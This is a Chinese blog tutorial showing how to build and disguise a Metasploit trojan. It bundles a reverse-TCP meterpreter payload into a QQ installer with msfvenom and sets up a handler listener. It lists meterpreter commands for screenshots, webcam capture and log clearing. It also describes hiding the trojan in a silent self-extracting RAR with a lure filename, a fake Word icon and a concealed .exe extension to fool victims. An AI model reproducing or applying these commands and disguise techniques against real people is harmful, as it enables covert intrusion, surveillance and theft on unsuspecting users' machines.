msf之木马程序

阳光穿透心脏的1/2处 2022-12-06 15:08 280阅读 0赞

### 目录 ###

*   *  捆绑木马
     *   *   *  生成木马文件
             *   *  附：msfvenom介绍
                 *   *  msfvenom简介
                     *  msfvenom生成
                     *  exploit/multi/handler模块简介
             *  设置监听反弹
             *  发送木马
             *   *  查看对方的ip
                 *  查看对方目录
                 *  截图
                 *  开启摄像头
                 *  附：Meterpreter常用命令
             *  进一步获取权限
             *  伪装

## 捆绑木马 ##

这里使用的是Kali linux虚拟机  
攻击机ip是192.168.0.108  
靶机ip是192.168.177.134

#### 生成木马文件 ####

首先上传一个正常的安装包到kali里面

我这里下了一个QQ  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center]  
把它上传到了`root/dy/`路径下

![在这里插入图片描述][20200913215539254.png_pic_center]

然后开始捆绑

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe

`-p`：指定后面的payload

`windows/meterpreter/reverse_tcp`：申明这是一个windows系统下的一个反弹tcp

`LHOST=192.168.0.108,`：设置反弹回来的ip，即你的kali的ip地址

还可以设置返回的端口，这里就不设置了，默认返回端口是4444

`-f`： 代表要捆绑的文件类型，这里是一个exe文件

`-x`：指定你要捆绑的文件的路径及文件名，这里我选择的是root/dy/里的PCQQ2020.exe

`-o`：指定生成的木马文件的路径及文件名，这里我把它保存在原路径里，名字就叫QQ.exe

生成完毕  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 1]

##### 附：msfvenom介绍 #####

###### msfvenom简介 ######

msfvenom是msfpayload,msfencode的结合体，可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线。  
msfvenom重要参数：（可以使用msfvenom -h查看所有参数）

-p payload设置
    -e 编码设置
    -a 系统结构，默认x86
    -s payload最大大小
    -i 编码次数
    -f 生成文件格式

###### msfvenom生成 ######

生成payload，有有两个必须的选项：`-p`和`-f`  
使用-p来指定要使用的payload。

./msfvenom –l payloads      //查看所有msf可用的payload列表

使用-f来指定payload的输出格式

./msfvenom -p windows/meterpreter/bind_tcp -f exe

./msfvenom --help –formats      //查看msf支持的输出格式

一个典型的msfvenom使用举例如下：

$./msfvenom -p windows/meterpreter/reverse_tcplhost=[Attacker IP]lport=4444 -f  exe -o /tmp/my_payload.exe

###### exploit/multi/handler模块简介 ######

msf>use exploit/multi/handler
    #使用exploit/multi/handler监听连入的backdoor
    msf exploit(handler)>set payload windows/meterpreter/reverse_http
    #设置对应的payload。
    Msf exploit(handler)>show options
    #显示所有的设置如果需要的话，可能还需要将LHOST，LPORT,设置成与payload中相同的地址和端口。

#### 设置监听反弹 ####

msfconsole
    use multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.108
    set lport 4444
    run

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 2]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 3]

#### 发送木马 ####

接下来将木马文件发送给目标，至于怎么让目标信任你，安装你发过去的文件。就看你的社工能力了。  
作为一个遵守中华人民共和国网络安全法的四有青年，我当然是选择把木马文件发送到另一台windows系统的虚拟机里面。

先将木马文件发到物理机上，然后再从物理机上传到虚拟机上  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 4]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 5]

然后双击运行QQ  
kali就已经连接到了靶机  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 6]

##### 查看对方的ip #####

ipconfig

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 7]

##### 查看对方目录 #####

dir

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 8]

##### 截图 #####

screenshot

![在这里插入图片描述][20200913224344830.png_pic_center]就会截一张当前靶机的图片，保存的路径会提示出来的  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 9]

##### 开启摄像头 #####

因为虚拟机没开摄像头，所以失败  
![在这里插入图片描述][20200913224214137.png_pic_center]

##### 附：Meterpreter常用命令 #####

info                    #查看已有模块信息
    getuid                  #查看权限
    getpid                  #获取当前进程的pid
    sysinfo                 #查看目标机系统信息
    ps                      #查看当前活跃进程
    kill <PID值>            #杀死进程
    reboot / shutdown       #重启/关机shell #进入目标机cmd shell 
    webcam_list             #查看摄像头
    webcam_snap             #通过摄像头拍照
    webcam_stream           #通过摄像头开启视频
    execute                 #在目标机中执行文件execute -H -i -f 
    cmd.exe                 #创建新进程cmd.exe，-H不可见，-i交互
    migrate <pid值>         #将Meterpreter会话移植到指定pid值进程中
    clearav                 #清除windows中的应用程序日志、系统日志、安全日志
    enumdesktops            #查看可用的桌面
    getdesktop              #获取当前meterpreter 关联的桌面
    set_desktop             #设置meterpreter关联的桌面 -h查看帮助
    screenshot              #截屏
    use espia               #或者使用espia模块截屏 然后输入screengrab
    run vnc                 #使用vnc远程桌面连接

#### 进一步获取权限 ####

shell

目标主机就是你的了  
![shell][]

如果对方就是不下载安装你发的文件怎么办？  
RAR有一个自解压的功能  
我们可以利用这一点来达到目的  
有两个文件，一个是刚刚生成的木马文件，一个是一个txt文档  
全部选中，右击添加到压缩文件，注意这里一定要用rar压缩方式

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 10]

`常规里面`

文件名可以是一个诱惑性的，比如学妹联系方式.txt，这里的txt不是文件类型，是文件名的一部分，它的文件类型还是exe  
压缩格式RAR，选择创建自解压格式压缩文件

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 11]  
`高级`选项中，有个自解压选项![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 12]  
选中它  
常规：解压路径随便填一个，这里放在C盘根目录

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 13]

设置：解压前运行txt文件，解压后运行QQ.exe文件  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 14]

模式：解压时隐藏所有信息![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 15][]

然后确定，确定，再确定

就会解压出一个名为学妹联系方式的文件  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 16]将这个文件发出去

同样设置监听反弹，与第一部分一样

msfconsole
    use multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.108
    set lport 4444
    run

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 17]  
当打开这个文档时，显示的是txt文件里的内容，但是QQ.exe也暗中执行了。  
当然，实际情况中得换一个轻量级的文件，否则别人看到一个txt文件有80多mb，肯定会怀疑的。

#### 伪装 ####

如何伪装的更像一点呢？  
这里以QQ.exe举例

介绍两个工具

[BeCyIconGrabber][]，这个工具可以提取文件图标。  
这里提取了一个word文档的图标  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 18]

[Resource Hacker][]  
这个工具能修改文件图标  
将它的图标换成word文档的图标  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 19]

这是更改图标后与更改前的区别  
![在这里插入图片描述][20200914002127118.png_pic_center]  
因为需要管理员权限才能执行，所以多了个盾牌的标记。  
换成其它的文件就能避免出现此类情况

当然，因为微软默认是隐藏后缀名的，一般情况下非专业人士都不会修改成显示后缀名的。所以一般情况下被攻击者看不到后缀的。如下图：

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 20]

但是，万一被攻击者显示后缀名了呢？  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 21]  
也有办法伪装  
把文件名取得长一点，windows就会只显示一部分内容，将后面部分的文件名隐藏。如下：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 22]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center]: /images/20221123/3f20b9d006ff4e90877e7d3afcfebb31.png
[20200913215539254.png_pic_center]: /images/20221123/64f57741810b4cde8bcc7e5245b66724.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 1]: /images/20221123/6fd1e5b13d1246648a286b409fdfad95.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 2]: /images/20221123/171314fea58b4251ba4c822e8cc7834c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 3]: /images/20221123/d16e34e4136f4262b0299ba9c107f017.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 4]: /images/20221123/124a95a60f94497ca872790f7f2e9561.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 5]: /images/20221123/4ec604d8a49844ee94937a6a630455ad.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 6]: /images/20221123/9785b9ffa31243d1a3eb15c34cad4b6d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 7]: /images/20221123/808fb11cbaf049e5a230668c7d073f02.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 8]: /images/20221123/0ab8139c7a314133b9341d2f4b61c446.png
[20200913224344830.png_pic_center]: /images/20221123/f74491b4c92342998ddc7ec3df1bc1ef.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 9]: /images/20221123/585dbf0d69e24d9a8326efcf54b759cb.png
[20200913224214137.png_pic_center]: /images/20221123/05ad142feee1456eb84400d01878cdeb.png
[shell]: /images/20221123/c40be9119b0349e7972ffb7489cc0b3b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 10]: /images/20221123/ad679694cfa749afb37318b5d38cfa23.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 11]: /images/20221123/c5cf42f4f52d4c28b455d063d1335263.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 12]: /images/20221123/0a1139908a9142f1a60eee7777c8c856.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 13]: /images/20221123/b209b2b611d54f868eb0f939523037ee.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 14]: /images/20221123/85c2981c899b42f49a213faa2c0d3dff.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 15]: /images/20221123/88ca73ad2e614f51b71f77b71e3f870f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 16]: /images/20221123/e1dd089ea4da4a4c923edcbe563b2930.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 17]: /images/20221123/a21c16e875214660b1dbf56f9aaa8d0d.png
[BeCyIconGrabber]: https://download.csdn.net/download/weixin_45663905/12839823
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 18]: /images/20221123/76e8be78677c439fbefc362dfb34d68f.png
[Resource Hacker]: https://download.csdn.net/download/weixin_45663905/12839824
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 19]: /images/20221123/80f624f61bd14a1f8d96ced573b1e43f.png
[20200914002127118.png_pic_center]: /images/20221123/921b8c855a294bd4a033599ba351eb66.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 20]: /images/20221123/1580ba63d70348448d5a30b1483834d9.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 21]: /images/20221123/0d9b5ed74eed42a5b91205df81b4ed02.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 22]: /images/20221123/d0b2792002704bf6babcd6dc03a20ef3.png